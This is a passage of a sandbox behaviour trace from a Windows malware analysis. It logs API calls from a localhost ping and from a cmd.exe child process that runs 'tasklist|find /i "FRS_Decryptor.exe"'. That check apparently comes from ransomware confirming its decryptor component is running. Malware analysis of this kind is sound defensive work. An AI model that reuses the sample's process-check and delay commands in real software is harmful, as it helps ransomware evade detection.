[0130.155] GetFileType (hFile=0x28) returned 0x2 [0130.155] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0130.155] GetLastError () returned 0x6 [0130.155] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15✨") returned 0x0 [0130.155] _fileno (_File=0x76ea4c28) returned 1 [0130.155] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0130.155] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.155] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x458970 [0130.155] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x458970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0130.155] _fileno (_File=0x76ea4c28) returned 1 [0130.155] _write (in: _FileHandle=1, _Buf=0x458970*, _MaxCharCount=0x9 | out: _Buf=0x458970*) returned 9 [0130.155] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.155] _fileno (_File=0x76ea4c28) returned 1 [0130.155] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0130.155] LocalFree (hMem=0x458970) returned 0x0 [0130.155] LocalFree (hMem=0x467fa0) returned 0x0 [0130.155] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x15eed8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0130.155] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x15eeac, nSize=0x0, Arguments=0x15eea8 | out: lpBuffer="羠F\x15᧰\x94䰨盪❏") returned 0x5c [0130.155] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.155] _fileno (_File=0x76ea4c28) returned 1 [0130.155] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.155] GetFileType (hFile=0x28) returned 0x2 [0130.155] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ee70 | out: lpMode=0x15ee70) returned 0 [0130.155] GetLastError () returned 0x6 [0130.155] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15edd4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0130.155] _fileno (_File=0x76ea4c28) returned 1 [0130.155] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0130.155] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0130.156] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x468068 [0130.156] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x468068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0130.156] _fileno (_File=0x76ea4c28) returned 1 [0130.156] _write (in: _FileHandle=1, _Buf=0x468068*, _MaxCharCount=0x5c | out: _Buf=0x468068*) returned 92 [0130.156] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.156] _fileno (_File=0x76ea4c28) returned 1 [0130.156] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0130.156] LocalFree (hMem=0x468068) returned 0x0 [0130.156] LocalFree (hMem=0x467fa0) returned 0x0 [0130.156] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x15eeb8, nSize=0x0, Arguments=0x15eeb4 | out: lpBuffer="羠F\x15ᨧ\x94䰨盪❓") returned 0x61 [0130.156] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.156] _fileno (_File=0x76ea4c28) returned 1 [0130.156] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.156] GetFileType (hFile=0x28) returned 0x2 [0130.156] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ee7c | out: lpMode=0x15ee7c) returned 0 [0130.156] GetLastError () returned 0x6 [0130.156] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ede0, nSize=0x50 | out: lpBuffer="\x15❓") returned 0x0 [0130.156] _fileno (_File=0x76ea4c28) returned 1 [0130.156] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0130.156] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0130.156] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x468070 [0130.156] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x468070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0130.156] _fileno (_File=0x76ea4c28) returned 1 [0130.156] _write (in: _FileHandle=1, _Buf=0x468070*, _MaxCharCount=0x61 | out: _Buf=0x468070*) returned 97 [0130.156] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.156] _fileno (_File=0x76ea4c28) returned 1 [0130.156] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0130.156] LocalFree (hMem=0x468070) returned 0x0 [0130.156] LocalFree (hMem=0x467fa0) returned 0x0 [0130.156] IcmpCloseHandle (IcmpHandle=0x456a68) returned 1 [0130.156] LocalFree (hMem=0x45c2c8) returned 0x0 [0130.156] LocalFree (hMem=0x465270) returned 0x0 [0130.156] WSACleanup () returned 0 [0130.157] exit (_Code=0) Thread: id = 392 os_tid = 0x65c Thread: id = 393 os_tid = 0x3c8 Process: id = "139" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x613a3000" os_pid = "0x518" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7172 start_va = 0xa70000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 7173 start_va = 0xa90000 end_va = 0xa91fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 7174 start_va = 0xaa0000 end_va = 0xaaefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 7175 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 7176 start_va = 0xaf0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 7177 start_va = 0xbf0000 end_va = 0xbf3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 7178 start_va = 0xc00000 end_va = 0xc00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 7179 start_va = 0xc10000 end_va = 0xc11fff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 7180 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7181 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7182 start_va = 0x7f890000 end_va = 0x7f8b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f890000" filename = "" Region: id = 7183 start_va = 0x7f8ba000 end_va = 0x7f8bafff entry_point = 0x0 region_type = private name = "private_0x000000007f8ba000" filename = "" Region: id = 7184 start_va = 0x7f8bc000 end_va = 0x7f8befff entry_point = 0x0 region_type = private name = "private_0x000000007f8bc000" filename = "" Region: id = 7185 start_va = 0x7f8bf000 end_va = 0x7f8bffff entry_point = 0x0 region_type = private name = "private_0x000000007f8bf000" filename = "" Region: id = 7186 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7187 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7188 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7189 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7190 start_va = 0xce0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 7191 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7192 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7193 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7194 start_va = 0xa70000 end_va = 0xa7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 7195 start_va = 0xc20000 end_va = 0xc9dfff entry_point = 0xc20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7196 start_va = 0xd40000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 7197 start_va = 0xdc0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 7198 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7199 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7200 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7201 start_va = 0x7f790000 end_va = 0x7f88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f790000" filename = "" Region: id = 7202 start_va = 0xa80000 end_va = 0xa83fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 7203 start_va = 0xec0000 end_va = 0x1194fff entry_point = 0xec0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7222 start_va = 0xa90000 end_va = 0xa93fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Thread: id = 394 os_tid = 0x454 [0130.182] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0130.182] __set_app_type (_Type=0x1) [0130.182] __p__fmode () returned 0x76ea1768 [0130.182] __p__commode () returned 0x76ea176c [0130.182] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0130.182] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0130.183] GetCurrentThreadId () returned 0x454 [0130.183] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x454) returned 0x34 [0130.183] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0130.183] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0130.183] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.184] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.184] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xbefe3c | out: phkResult=0xbefe3c*=0x0) returned 0x2 [0130.184] VirtualQuery (in: lpAddress=0xbefe4b, lpBuffer=0xbefde4, dwLength=0x1c | out: lpBuffer=0xbefde4*(BaseAddress=0xbef000, AllocationBase=0xaf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.184] VirtualQuery (in: lpAddress=0xaf0000, lpBuffer=0xbefde4, dwLength=0x1c | out: lpBuffer=0xbefde4*(BaseAddress=0xaf0000, AllocationBase=0xaf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.184] VirtualQuery (in: lpAddress=0xaf1000, lpBuffer=0xbefde4, dwLength=0x1c | out: lpBuffer=0xbefde4*(BaseAddress=0xaf1000, AllocationBase=0xaf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.184] VirtualQuery (in: lpAddress=0xaf3000, lpBuffer=0xbefde4, dwLength=0x1c | out: lpBuffer=0xbefde4*(BaseAddress=0xaf3000, AllocationBase=0xaf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.184] VirtualQuery (in: lpAddress=0xbf0000, lpBuffer=0xbefde4, dwLength=0x1c | out: lpBuffer=0xbefde4*(BaseAddress=0xbf0000, AllocationBase=0xbf0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.185] GetConsoleOutputCP () returned 0x1b5 [0130.185] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0130.185] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0130.185] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0130.185] SetConsoleMode (hConsoleHandle=0x2b8, dwMode=0x0) returned 0 [0130.185] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0130.185] GetConsoleMode (in: hConsoleHandle=0x2b8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0130.185] _get_osfhandle (_FileHandle=0) returned 0x24 [0130.185] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0130.185] GetEnvironmentStringsW () returned 0xdc40c0* [0130.185] FreeEnvironmentStringsA (penv="=") returned 1 [0130.185] GetEnvironmentStringsW () returned 0xdc40c0* [0130.185] FreeEnvironmentStringsA (penv="=") returned 1 [0130.185] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xbeed8c | out: phkResult=0xbeed8c*=0x44) returned 0x0 [0130.185] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x0, lpData=0xbeed98*=0xb2, lpcbData=0xbeed90*=0x1000) returned 0x2 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x4, lpData=0xbeed98*=0x1, lpcbData=0xbeed90*=0x4) returned 0x0 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x0, lpData=0xbeed98*=0x1, lpcbData=0xbeed90*=0x1000) returned 0x2 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x4, lpData=0xbeed98*=0x0, lpcbData=0xbeed90*=0x4) returned 0x0 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x4, lpData=0xbeed98*=0x40, lpcbData=0xbeed90*=0x4) returned 0x0 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x4, lpData=0xbeed98*=0x40, lpcbData=0xbeed90*=0x4) returned 0x0 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x0, lpData=0xbeed98*=0x40, lpcbData=0xbeed90*=0x1000) returned 0x2 [0130.186] RegCloseKey (hKey=0x44) returned 0x0 [0130.186] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xbeed8c | out: phkResult=0xbeed8c*=0x44) returned 0x0 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x0, lpData=0xbeed98*=0x40, lpcbData=0xbeed90*=0x1000) returned 0x2 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x4, lpData=0xbeed98*=0x1, lpcbData=0xbeed90*=0x4) returned 0x0 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x0, lpData=0xbeed98*=0x1, lpcbData=0xbeed90*=0x1000) returned 0x2 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x4, lpData=0xbeed98*=0x0, lpcbData=0xbeed90*=0x4) returned 0x0 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x4, lpData=0xbeed98*=0x9, lpcbData=0xbeed90*=0x4) returned 0x0 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x4, lpData=0xbeed98*=0x9, lpcbData=0xbeed90*=0x4) returned 0x0 [0130.186] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xbeed94, lpData=0xbeed98, lpcbData=0xbeed90*=0x1000 | out: lpType=0xbeed94*=0x0, lpData=0xbeed98*=0x9, lpcbData=0xbeed90*=0x1000) returned 0x2 [0130.186] RegCloseKey (hKey=0x44) returned 0x0 [0130.186] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500ad [0130.186] srand (_Seed=0x5aa500ad) [0130.186] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0130.186] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0130.186] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0130.186] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdc40c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0130.186] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.186] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.186] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0130.186] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.186] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.186] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.186] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.186] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.186] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.186] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.187] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.187] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.187] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.187] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbefb6c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0130.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xbefb6c, lpFilePart=0xbefb68 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbefb68*="Desktop") returned 0x1c [0130.187] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0130.187] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xbef8e8 | out: lpFindFileData=0xbef8e8) returned 0xdc42d8 [0130.187] FindClose (in: hFindFile=0xdc42d8 | out: hFindFile=0xdc42d8) returned 1 [0130.187] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xbef8e8 | out: lpFindFileData=0xbef8e8) returned 0xdc42d8 [0130.187] FindClose (in: hFindFile=0xdc42d8 | out: hFindFile=0xdc42d8) returned 1 [0130.187] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0130.187] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xbef8e8 | out: lpFindFileData=0xbef8e8) returned 0xdc42d8 [0130.187] FindClose (in: hFindFile=0xdc42d8 | out: hFindFile=0xdc42d8) returned 1 [0130.187] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0130.187] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0130.187] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0130.187] GetEnvironmentStringsW () returned 0xdc6190* [0130.188] FreeEnvironmentStringsA (penv="=") returned 1 [0130.188] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0130.188] GetConsoleOutputCP () returned 0x1b5 [0130.188] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0130.188] GetUserDefaultLCID () returned 0x409 [0130.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0130.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xbefc98, cchData=128 | out: lpLCData="0") returned 2 [0130.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xbefc98, cchData=128 | out: lpLCData="0") returned 2 [0130.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xbefc98, cchData=128 | out: lpLCData="1") returned 2 [0130.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0130.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0130.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0130.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0130.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0130.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0130.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0130.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0130.189] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0130.189] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0130.189] setlocale (category=0, 